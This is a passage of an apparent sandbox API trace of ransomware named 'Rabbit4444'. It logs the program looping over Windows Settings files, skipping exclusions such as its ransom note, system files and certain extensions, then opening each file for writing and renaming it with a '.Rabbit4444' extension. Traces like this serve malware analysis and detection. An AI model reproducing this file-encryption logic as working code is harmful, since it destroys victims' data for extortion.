lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="boot") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.825] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms") returned="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms" [0056.825] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.825] lstrlenW (lpString="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms") returned 56 [0056.825] lstrlenW (lpString="Rabbit4444") returned 10 [0056.825] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.825] lstrlenW (lpString=".dll") returned 4 [0056.825] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.825] lstrlenW (lpString=".lnk") returned 4 [0056.825] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.825] lstrlenW (lpString=".ini") returned 4 [0056.825] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.825] lstrlenW (lpString=".sys") returned 4 [0056.825] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacypersonalization.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.826] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.826] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14813644270) returned 1 [0056.826] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1117) returned 1 [0056.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0056.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0056.826] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.828] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14813957664) returned 1 [0056.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0056.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0056.829] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.829] CloseHandle (hObject=0x298) returned 1 [0056.829] CloseHandle (hObject=0x278) returned 1 [0056.829] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms.Rabbit4444") returned 184 [0056.829] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacypersonalization.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyPersonalization.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacypersonalization.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.830] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae233c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdae233c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyRadios.settingcontent-ms", cAlternateFileName="AAC1C7~1.SET")) returned 1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2=".") returned 1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="..") returned 1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="windows") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="boot") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.830] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.830] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyRadios.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyRadios.settingcontent-ms") returned="AAA_SettingsPagePrivacyRadios.settingcontent-ms" [0056.830] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.831] lstrlenW (lpString="AAA_SettingsPagePrivacyRadios.settingcontent-ms") returned 47 [0056.831] lstrlenW (lpString="Rabbit4444") returned 10 [0056.831] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.831] lstrlenW (lpString=".dll") returned 4 [0056.831] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.831] lstrlenW (lpString=".lnk") returned 4 [0056.831] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.831] lstrlenW (lpString=".ini") returned 4 [0056.831] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.831] lstrlenW (lpString=".sys") returned 4 [0056.831] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyradios.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.831] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.831] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14814185035) returned 1 [0056.831] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1072) returned 1 [0056.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.831] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.832] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.834] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14814437985) returned 1 [0056.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.834] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.834] CloseHandle (hObject=0x298) returned 1 [0056.834] CloseHandle (hObject=0x278) returned 1 [0056.834] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms.Rabbit4444") returned 175 [0056.834] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyradios.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyRadios.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacyradios.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.835] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbc7187, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdbc7187, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", cAlternateFileName="AA247E~1.SET")) returned 1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2=".") returned 1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="..") returned 1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="windows") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="boot") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.835] lstrcmpiW (lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.835] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms") returned="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms" [0056.835] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.835] lstrlenW (lpString="AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms") returned 53 [0056.835] lstrlenW (lpString="Rabbit4444") returned 10 [0056.836] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.836] lstrlenW (lpString=".dll") returned 4 [0056.836] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.836] lstrlenW (lpString=".lnk") returned 4 [0056.836] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.836] lstrlenW (lpString=".ini") returned 4 [0056.836] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.836] lstrlenW (lpString=".sys") returned 4 [0056.836] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacysiufsettings.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.836] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.836] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14814676365) returned 1 [0056.836] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1102) returned 1 [0056.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.836] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.837] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.839] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14814932336) returned 1 [0056.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.839] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.839] CloseHandle (hObject=0x298) returned 1 [0056.839] CloseHandle (hObject=0x278) returned 1 [0056.839] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms.Rabbit4444") returned 181 [0056.839] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacysiufsettings.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacySIUFSettings.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacysiufsettings.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.840] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf8458, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdcf8458, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", cAlternateFileName="AA907A~1.SET")) returned 1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2=".") returned 1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="..") returned 1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="windows") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="boot") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.840] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.840] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyWebcam.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyWebcam.settingcontent-ms") returned="AAA_SettingsPagePrivacyWebcam.settingcontent-ms" [0056.840] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.840] lstrlenW (lpString="AAA_SettingsPagePrivacyWebcam.settingcontent-ms") returned 47 [0056.840] lstrlenW (lpString="Rabbit4444") returned 10 [0056.840] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.840] lstrlenW (lpString=".dll") returned 4 [0056.840] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.840] lstrlenW (lpString=".lnk") returned 4 [0056.840] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.840] lstrlenW (lpString=".ini") returned 4 [0056.840] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.841] lstrlenW (lpString=".sys") returned 4 [0056.841] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.841] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacywebcam.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.841] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.841] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14815159515) returned 1 [0056.841] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1072) returned 1 [0056.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.841] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.842] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.843] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14815404755) returned 1 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.843] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.843] CloseHandle (hObject=0x298) returned 1 [0056.844] CloseHandle (hObject=0x278) returned 1 [0056.844] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms.Rabbit4444") returned 175 [0056.844] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms" (normalized: 